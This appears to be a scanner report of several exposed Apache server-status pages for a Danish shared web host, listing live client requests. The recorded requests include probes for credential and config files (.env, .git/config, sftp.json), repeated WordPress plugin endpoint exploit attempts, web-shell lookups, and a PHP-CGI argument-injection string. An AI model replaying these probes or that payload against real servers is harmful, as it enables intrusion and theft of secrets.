193.176.211.48webhotel5.webhosting.dkGET /wp-admin/images/screenshots/ HTTP/1.0 23-4203680/18/507_ 0.0115220.00.000.26 81.19.232.105www.abstrax.dkGET /robots.txt HTTP/1.0 24-4203720/11/497_ 0.01430.00.000.28 68.183.180.73webhotel5.webhosting.dkGET / HTTP/1.0 25-4203730/11/496_ 0.01440.00.000.38 68.183.180.73webhotel5.webhosting.dkGET / HTTP/1.0 26-4203740/11/497_ 0.00200.00.000.22 68.183.180.73webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 27-4203750/11/496_ 0.01200.00.000.17 68.183.180.73webhotel5.webhosting.dkGET /about HTTP/1.0 28-4203760/10/480_ 0.017200.00.000.21 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 29-4203790/10/495_ 0.015650.00.001.93 36.138.205.155webhotel5.webhosting.dkPOST / HTTP/1.0 30-4203800/10/447_ 0.015800.00.000.28 36.138.205.155webhotel5.webhosting.dkGET /.env HTTP/1.0 31-4203810/10/418_ 0.011610.00.000.12 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 32-4203820/10/315_ 0.012100.00.000.10 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 33-4203830/10/315_ 0.011600.00.000.10 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 34-4203840/10/265_ 0.012100.00.000.07 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 35-3-0/0/299. 0.0668400.00.000.29 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 36-3-0/0/198. 0.0768400.00.000.05 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 37-3-0/0/181. 0.0868400.00.000.05 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 38-3-0/0/55. 0.0768400.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 39-1-0/0/16. 0.01787900.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 40-1-0/0/16. 0.01787900.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 41-1-0/0/16. 0.01787900.00.000.04 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 42-1-0/0/16. 0.01787900.00.000.07 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 43-1-0/0/16. 0.02787900.00.000.15 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 44-1-0/0/16. 0.02787900.00.000.10 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 45-1-0/0/16. 0.02787900.00.000.02 145.239.10.137webhotel5.webhosting.dkGET /help.php HTTP/1.0 46-1-0/0/15. 0.01787900.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde352085724
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Friday, 12-Jul-2024 10:55:32 CEST Restart Time: Friday, 12-Jul-2024 04:00:03 CEST Parent Server Generation: 6 Server uptime: 6 hours 55 minutes 29 seconds Total accesses: 37598 - Total Traffic: 17.9 MB CPU Usage: u1.31 s.68 cu0 cs0 - .00798% CPU load 1.51 requests/sec - 753 B/second - 499 B/request 1 requests currently being processed, 31 idle workers W__________.__________________....___........................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-6120400/28/1177W 0.03000.00.010.50 172.105.16.34webhotel5.webhosting.dkGET /server-status HTTP/1.0 1-6120410/28/1178_ 0.04230.00.010.51 172.105.16.34webhotel5.webhosting.dkGET / HTTP/1.0 2-6120510/27/1175_ 0.031900.00.060.59 144.202.101.49webhotel5.webhosting.dkHEAD /bc HTTP/1.0 3-6120480/28/1207_ 0.03000.00.010.43 172.105.16.34webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 4-6120520/27/1175_ 0.051900.00.010.57 144.202.101.49webhotel5.webhosting.dkHEAD /bk HTTP/1.0 5-6120420/28/1126_ 0.03100.00.011.07 172.105.16.34webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 6-6120530/27/1124_ 0.041800.00.010.46 144.202.101.49webhotel5.webhosting.dkHEAD /backup HTTP/1.0 7-6120540/27/1124_ 0.031810.00.010.34 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 8-6120550/27/1125_ 0.041800.00.010.55 144.202.101.49webhotel5.webhosting.dkHEAD /old HTTP/1.0 9-6120430/28/1160_ 0.03100.00.050.97 172.105.16.34webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 10-6120560/27/1143_ 0.041800.00.010.38 144.202.101.49webhotel5.webhosting.dkHEAD /main HTTP/1.0 11-6-0/0/1130. 0.0625100.00.000.45 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 12-6120590/27/1140_ 0.031800.00.020.42 144.202.101.49webhotel5.webhosting.dkHEAD /new HTTP/1.0 13-6120600/27/1141_ 0.031810.00.010.44 144.202.101.49webhotel5.webhosting.dkHEAD /home HTTP/1.0 14-6122270/27/1086_ 0.04100.00.010.53 172.105.16.34webhotel5.webhosting.dkGET /server HTTP/1.0 15-6120440/28/1091_ 0.03100.00.010.37 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 16-6120450/28/1044_ 0.04100.00.010.32 172.105.16.34webhotel5.webhosting.dkGET /about HTTP/1.0 17-6120460/28/1027_ 0.04100.00.010.44 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 18-6120610/27/1077_ 0.0516110.00.010.79 81.19.232.105www.oellgaard.dkGET / HTTP/1.0 19-6123410/27/1077_ 0.04000.00.010.53 172.105.16.34webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 20-6123600/27/1044_ 0.02000.00.010.44 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 21-6124440/27/1040_ 0.04000.00.010.60 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 22-6124450/26/978_ 0.04010.00.010.36 172.105.16.34webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 23-6124460/27/1080_ 0.04000.00.010.54 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 24-6124550/26/1006_ 0.032000.00.010.37 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 25-6120620/27/925_ 0.041600.00.010.38 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 26-6120630/27/974_ 0.031500.00.011.54 54.187.226.150www.oellgaard.dkGET / HTTP/1.0 27-6124560/26/970_ 0.061900.00.010.35 144.202.101.49webhotel5.webhosting.dkHEAD /wordpress HTTP/1.0 28-6124570/26/965_ 0.051950.00.010.40 144.202.101.49webhotel5.webhosting.dkHEAD / HTTP/1.0 29-6124580/26/898_ 0.031900.00.020.30 144.202.101.49webhotel5.webhosting.dkHEAD /wp HTTP/1.0 30-6-0/0/729. 0.0680800.00.000.28 81.19.232.105webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 31-6-0/0/693. 0.08806110.00.000.36 178.128.105.102www.kbw.dkGET / HTTP/1.0 32-6-0/0/694. 0.07807270.00.000.26 81.19.232.105www.woodwind.dkGET /robots.txt HTTP/1.0 33-6-0/0/659. 0.0780600.00.000.23 91.49.129.83webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 34-6120640/27/586_ 0.05600.00.010.24 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 35-6120650/27/430_ 0.04240.00.010.13 172.105.16.34webhotel5.webhosting.dkGET / HTTP/1.0 36-6120660/27/430_ 0.05200.00.010.11 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 37-6-0/0/352. 0.06169700.00.000.13 62.146.173.3www.woodwind.dkGET /wp-content/plugins/css-ready-sel/file.php HTTP/1.0 38-6-0/0/188. 0.06169700.00.000.11 62.146.173.3www.woodwind.dkGET /AK-74.php HTTP/1.0 39-6-0/0/178. 0.06169700.00.000.06 193.176.211.2webhotel5.webhosting.dkGET /wp-includes/theme-compat/wp-conflg.php HTTP/1.0 40-2-0/0/28. 0.021412500.00.000.01 62.72.43.97webhotel5.webhosting.dkGET /mail.php HTTP/1.0 41-2-0/0/28. 0.051412500.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 42-2-0/0/28. 0.031412500.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 43-2-0/0/28. 0.031412500.00.000.01 62.72.43.97webhotel5.webhosting.dkGET /wp-content/content.php HTTP/1.0 44-2-0/0/28. 0.031412500.00.000.01 91.92.243.107webhotel5.webhosting.dkGET /wp-content/about.php HTTP/1.0 45-2-0/0/28. 0.021412500.00.000.01 62.72.43.97webhotel5.webhosting.dkGET /link-manager.php HTTP/1.0 46-2-0/0/28. 0.021412500.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 47-2-0/0/28. 0.031412500.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 48-2-0/0/28. 0.031412500.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3dc2f5662
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Wednesday, 10-Jul-2024 09:58:34 CEST Restart Time: Wednesday, 10-Jul-2024 06:05:04 CEST Parent Server Generation: 3 Server uptime: 3 hours 53 minutes 30 seconds Total accesses: 16082 - Total Traffic: 56.8 MB CPU Usage: u.61 s.29 cu0 cs0 - .00642% CPU load 1.15 requests/sec - 4250 B/second - 3703 B/request 1 requests currently being processed, 32 idle workers ______________W___._______________.............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-3195020/2/478_ 0.001100.00.001.21 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 1-3190870/3/480_ 0.00000.00.001.12 23.239.4.252webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 2-3190880/3/479_ 0.00000.00.002.24 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 3-3191130/3/478_ 0.00010.00.041.07 23.239.4.252webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 4-3195030/2/478_ 0.011100.00.001.27 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 5-3195040/2/478_ 0.001100.00.002.29 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 6-3195050/2/478_ 0.001100.00.001.29 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 7-3194450/2/428_ 0.001200.00.000.69 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 8-3195060/2/478_ 0.001100.00.001.14 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 9-3195070/2/478_ 0.00330.00.002.93 23.239.4.252webhotel5.webhosting.dkGET / HTTP/1.0 10-3195080/2/478_ 0.00300.00.003.11 111.90.148.123webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 11-3195090/2/478_ 0.00350.00.001.61 23.239.4.252webhotel5.webhosting.dkGET / HTTP/1.0 12-3195100/2/478_ 0.00310.00.001.18 23.239.4.252webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 13-3195110/2/477_ 0.00210.00.001.04 23.239.4.252webhotel5.webhosting.dkGET /server HTTP/1.0 14-3195800/1/476W 0.00000.00.000.90 23.239.4.252webhotel5.webhosting.dkGET /server-status HTTP/1.0 15-3195810/1/475_ 0.002200.00.002.29 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 16-3195120/2/477_ 0.00210.00.001.61 23.239.4.252webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 17-3195820/1/468_ 0.002100.00.001.11 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 18-3-0/0/474. 0.073100.00.001.40 80.167.91.14webhotel5.webhosting.dkGET /favicon.ico HTTP/1.0 19-3195830/1/475_ 0.002110.00.002.92 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 20-3195840/1/467_ 0.002100.00.000.81 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 21-3195130/2/426_ 0.00110.00.001.53 23.239.4.252webhotel5.webhosting.dkGET /about HTTP/1.0 22-3195140/2/381_ 0.00100.00.000.58 23.239.4.252webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 23-3195150/2/417_ 0.00100.00.001.14 51.222.253.3webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 24-3195850/1/417_ 0.002100.00.001.18 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 25-3195860/1/366_ 0.002110.00.001.28 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 26-3195870/1/367_ 0.002010.00.005.86 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 27-3195880/1/367_ 0.002010.00.000.75 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 28-3195890/1/365_ 0.002060.00.001.24 159.223.134.82webhotel5.webhosting.dkGET / HTTP/1.0 29-3195900/1/366_ 0.001980.00.004.16 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 30-3195910/1/365_ 0.001840.00.001.36 167.172.245.85webhotel5.webhosting.dkGET / HTTP/1.0 31-3195920/1/305_ 0.001850.00.000.33 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 32-3195930/1/237_ 0.001220.00.000.24 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 33-3195940/1/238_ 0.001200.00.000.53 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 34-3-0/0/237. 0.0962430.00.000.91 222.249.228.245webhotel5.webhosting.dkGET / HTTP/1.0 35-3-0/0/187. 0.086230.00.000.22 222.249.228.245webhotel5.webhosting.dkGET / HTTP/1.0 36-3-0/0/187. 0.0862460.00.000.24 222.249.228.245webhotel5.webhosting.dkGET / HTTP/1.0 37-3-0/0/150. 0.096110.00.000.19 149.56.160.150www.kbw.dkGET / HTTP/1.0 38-3-0/0/150. 0.106140.00.000.75 222.249.228.245webhotel5.webhosting.dkGET / HTTP/1.0 39-3-0/0/150. 0.086000.00.000.38 222.249.228.245webhotel5.webhosting.dkGET /favicon.ico HTTP/1.0 40-3-0/0/149. 0.0859490.00.000.22 222.249.228.245webhotel5.webhosting.dkGET / HTTP/1.0 41-3-0/0/149. 0.085900.00.000.21 172.109.143.70webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 42-3-0/0/100. 0.075740.00.000.16 104.234.204.144webhotel5.webhosting.dkGET / HTTP/1.0 43-2-0/0/50. 0.07382500.00.000.09 62.146.237.232webhotel5.webhosting.dkGET /wp-admin/css/colors/coffee/wp-casper.php HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde30d10d967
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Monday, 08-Jul-2024 09:37:40 CEST Restart Time: Monday, 08-Jul-2024 06:05:03 CEST Parent Server Generation: 3 Server uptime: 3 hours 32 minutes 37 seconds Total accesses: 28246 - Total Traffic: 10.2 MB CPU Usage: u1.21 s.53 cu0 cs0 - .0136% CPU load 2.21 requests/sec - 842 B/second - 380 B/request 1 requests currently being processed, 30 idle workers ____W__________________________................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-3508460/16/948_ 0.02000.00.000.49 142.93.129.190webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 1-3508170/16/898_ 0.02040.00.000.37 142.93.129.190webhotel5.webhosting.dkGET / HTTP/1.0 2-3504670/17/851_ 0.02200.00.000.31 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 3-3508490/16/894_ 0.02000.00.000.29 142.93.129.190webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 4-3516910/11/887W 0.00000.00.000.39 142.93.129.190webhotel5.webhosting.dkGET /server-status HTTP/1.0 5-3508550/15/893_ 0.011100.00.000.27 142.93.143.8webhotel5.webhosting.dkGET /about HTTP/1.0 6-3500270/19/794_ 0.03800.00.020.25 78.138.56.226webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 7-3500590/18/790_ 0.031100.00.000.29 142.93.143.8webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 8-3501510/18/791_ 0.03630.00.000.25 81.19.232.105webhotel5.webhosting.dkPOST / HTTP/1.0 9-3501810/18/790_ 0.02000.00.010.27 142.93.129.190webhotel5.webhosting.dkGET /about HTTP/1.0 10-3501530/18/689_ 0.02000.00.000.25 142.93.129.190webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 11-3502300/17/789_ 0.041100.00.000.35 142.93.143.8webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 12-3502600/17/789_ 0.021100.00.000.23 142.93.143.8webhotel5.webhosting.dkGET /login.action HTTP/1.0 13-3502930/17/839_ 0.021100.00.000.28 142.93.143.8webhotel5.webhosting.dkGET /_all_dbs HTTP/1.0 14-3504680/17/770_ 0.03070.00.010.28 142.93.129.190webhotel5.webhosting.dkGET / HTTP/1.0 15-3507040/16/768_ 0.021110.00.010.27 142.93.143.8webhotel5.webhosting.dkGET /server-status HTTP/1.0 16-3502950/17/818_ 0.021100.00.000.35 142.93.143.8webhotel5.webhosting.dkGET /.git/config HTTP/1.0 17-3502960/17/769_ 0.021100.00.000.24 142.93.143.8webhotel5.webhosting.dkven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.0 18-3502990/17/804_ 0.021000.00.010.33 142.93.143.8webhotel5.webhosting.dkGET /telescope/requests HTTP/1.0 19-3502970/17/788_ 0.011000.00.000.25 142.93.143.8webhotel5.webhosting.dkGET /config.json HTTP/1.0 20-3503000/17/788_ 0.021020.00.000.27 142.93.143.8webhotel5.webhosting.dkGET /?rest_route=/wp/v2/users/ HTTP/1.0 21-3506390/16/737_ 0.031200.00.000.23 142.93.143.8webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 22-3508540/15/679_ 0.01000.00.000.20 142.93.129.190webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 23-3503210/17/643_ 0.01900.00.000.21 91.92.244.2webhotel5.webhosting.dkGET /wp-includes/ID3/admin-ajax.php HTTP/1.0 24-3503890/17/641_ 0.03750.00.010.21 34.233.136.160webhotel5.webhosting.dkGET / HTTP/1.0 25-3504380/17/691_ 0.02700.00.000.23 34.233.136.160webhotel5.webhosting.dkGET /favicon.ico HTTP/1.0 26-3506060/17/638_ 0.03000.00.000.24 142.93.129.190webhotel5.webhosting.dkGET /server HTTP/1.0 27-3506270/17/589_ 0.04000.00.000.18 142.93.129.190webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 28-3507230/16/587_ 0.021100.00.000.22 142.93.143.8webhotel5.webhosting.dkGET /.env HTTP/1.0 29-3507240/16/586_ 0.011100.00.000.21 142.93.143.8webhotel5.webhosting.dkGET /.DS_Store HTTP/1.0 30-3508560/15/586_ 0.011100.00.000.30 142.93.143.8webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 31-3-0/0/519. 0.0551000.00.000.21 119.160.163.189webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 32-3-0/0/520. 0.0697500.00.000.24 62.146.237.49webhotel5.webhosting.dkGET /a.php HTTP/1.0 33-3-0/0/520. 0.0696900.00.000.15 62.146.237.49webhotel5.webhosting.dkGET /wp-content/plugins/about.php HTTP/1.0 34-3-0/0/418. 0.0658300.00.000.12 107.175.179.37webhotel5.webhosting.dkGET /.env HTTP/1.0 35-3-0/0/349. 0.05157200.00.000.13 193.176.211.176webhotel5.webhosting.dkGET /assets/contao/css/ HTTP/1.0 36-3-0/0/299. 0.06157300.00.000.08 193.176.211.176webhotel5.webhosting.dkGET /assets/contao/ HTTP/1.0 37-3-0/0/299. 0.06157300.00.000.09 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 38-3-0/0/299. 0.06157130.00.000.10 81.19.232.105webhotel5.webhosting.dkPOST / HTTP/1.0 39-3-0/0/299. 0.06157100.00.000.09 193.176.211.176webhotel5.webhosting.dkGET /wp-includes/css/dist/edit-site/ HTTP/1.0 40-2-0/0/200. 0.05471600.00.000.10 62.146.237.234webhotel5.webhosting.dkGET /wp-admin/css/colors/light/about.php HTTP/1.0 41-2-0/0/150. 0.06471510.00.000.05 62.146.173.3webhotel5.webhosting.dkGET /wp-includes/js/tinymce/ HTTP/1.0 42-2-0/0/150. 0.06471500.00.000.05 62.146.173.3webhotel5.webhosting.dkGET /wp-includes/Text/ HTTP/1.0 43-2-0/0/150. 0.05471500.00.000.09 62.146.237.234webhotel5.webhosting.dk /wp-includes/js/tinymce/skins/lightgray/img/index.php HTTP/1.0 44-2-0/0/150. 0.05471500.00.000.05 62.146.237.234webhotel5.webhosting.dkGET /wp-content/bak.php HTTP/1.0 45-2-0/0/100. 0.05471500.00.000.03 62.146.173.3webhotel5.webhosting.dkGET /wp-includes/rest-api/ HTTP/1.0 46-2-0/0/100. 0.05471500.00.000.05 62.146.237.234webhotel5.webhosting.dkGET /wp-includes/Text/about.php HTTP/1.0 47-2-0/0/100. 0.06471500.00.000.03 62.146.173.3webhotel5.webhosting.dkGET /wp-includes/js/ HTTP/1.0 48-1-0/0/50. 0.07739800.00.000.03 104.182.3.50www.lillekrabbe.dkGET /lab/dollmaker/socks.gif HTTP/1.0 49-1-0/0/50. 0.07739800.00.000.02 104.182.3.50www.lillekrabbe.dkGET /lab/dollmaker/pants3green.gif HTTP/1.0 < SrvChild Server number - generation PIDOS process ID
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde35c1d02f2
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Saturday, 06-Jul-2024 09:24:38 CEST Restart Time: Saturday, 06-Jul-2024 06:05:04 CEST Parent Server Generation: 3 Server uptime: 3 hours 19 minutes 34 seconds Total accesses: 10863 - Total Traffic: 7.6 MB CPU Usage: u1.66 s.71 cu0 cs0 - .0198% CPU load .907 requests/sec - 666 B/second - 734 B/request 1 requests currently being processed, 30 idle workers ___________________________...___W.............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-3523990/30/328_ 0.033010.00.010.11 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 1-3524000/30/358_ 0.032520.00.010.31 75.74.123.83webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 2-3524010/30/355_ 0.041700.00.010.19 103.196.78.76webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 3-3523920/30/348_ 0.0556400.00.010.12 130.255.166.121webhotel5.webhosting.dkGET / HTTP/1.0 4-3523930/30/347_ 0.045000.00.010.20 173.252.107.5webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 5-3523940/30/348_ 0.054900.00.010.24 173.252.107.14webhotel5.webhosting.dkGET /gartnerietsollund.html HTTP/1.0 6-3523880/31/349_ 0.04000.00.010.38 206.189.2.13webhotel5.webhosting.dkGET /about HTTP/1.0 7-3523950/30/344_ 0.044900.00.010.19 173.252.107.16webhotel5.webhosting.dkGET /gartnerietsollund.html HTTP/1.0 8-3523840/31/346_ 0.05000.00.010.13 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 9-3523860/31/345_ 0.05020.00.010.12 206.189.2.13webhotel5.webhosting.dkGET / HTTP/1.0 10-3523850/31/346_ 0.05250.00.010.15 69.160.160.55webhotel5.webhosting.dkGET / HTTP/1.0 11-3523890/31/345_ 0.04000.00.010.13 206.189.2.13webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 12-3523960/30/344_ 0.043800.00.010.21 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 13-3523970/30/344_ 0.044500.00.010.62 185.211.59.87webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 14-3523980/30/343_ 0.033200.00.010.14 93.92.200.189webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 15-3524020/30/291_ 0.061770.00.010.08 106.63.26.20webhotel5.webhosting.dkGET / HTTP/1.0 16-3524030/30/341_ 0.05600.00.010.11 101.118.11.94webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 17-3524130/30/340_ 0.0561210.00.010.13 46.228.199.158webhotel5.webhosting.dkGET / HTTP/1.0 18-3524270/30/341_ 0.03130.00.010.13 69.160.160.55webhotel5.webhosting.dkGET / HTTP/1.0 19-3524350/30/290_ 0.05060.00.010.23 51.38.123.137www.friling.dkHEAD / HTTP/1.0 20-3524430/30/290_ 0.05020.00.010.14 206.189.2.13webhotel5.webhosting.dkGET / HTTP/1.0 21-3524450/30/240_ 0.04000.00.010.15 